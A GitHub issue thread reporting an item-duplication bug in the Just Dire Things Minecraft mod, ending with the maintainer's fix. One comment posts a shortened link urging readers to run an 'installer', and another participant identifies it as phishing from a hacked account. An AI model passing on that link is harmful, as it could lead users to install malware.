### ISSUE TITLE
Item Dupe when Entity is holding a shulker box 

### ISSUE THREAD

**Issue by djnifos** [Direwolf20-MC/JustDireThings#148]
### Just Dire Things version

1.2.1

### Minecraft Version

1.21.1

### (Neo)Forge Version

21.1.34

### Modpack & Version

ATM10 0.44

### Do you have optifine or Rubidium installed?

No

### Describe the issue

Paradox machine dupes items in a shulker held by a Zombie

### Steps to reproduce

https://www.reddit.com/r/allthemods/comments/1f7jirz/atm10_paradox_machine_dupe_any_item/

The video is pretty concise.  
I'd imagine this would happen with llamas or donkeys too because you can equip a chest on them.

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by djnifos** [comment]
Be careful everyone, that's a hacked user posting phishing tools!

**Comment by djnifos** [comment]
Reported that user for the phish, hopefully that comment is removed before anyone clicks

**Comment by Direwolf20-MC** [comment]
Thanks DJ :). I’m gonna have to specify which tags to copy rather than all of them. Will be updating today or tomorrow for this.

**Comment by Direwolf20-MC** [comment]
Resolved by: https://github.com/Direwolf20-MC/JustDireThings/commit/2f1cc2af76b6e57bda19b5c22dbeaab693ec87c6
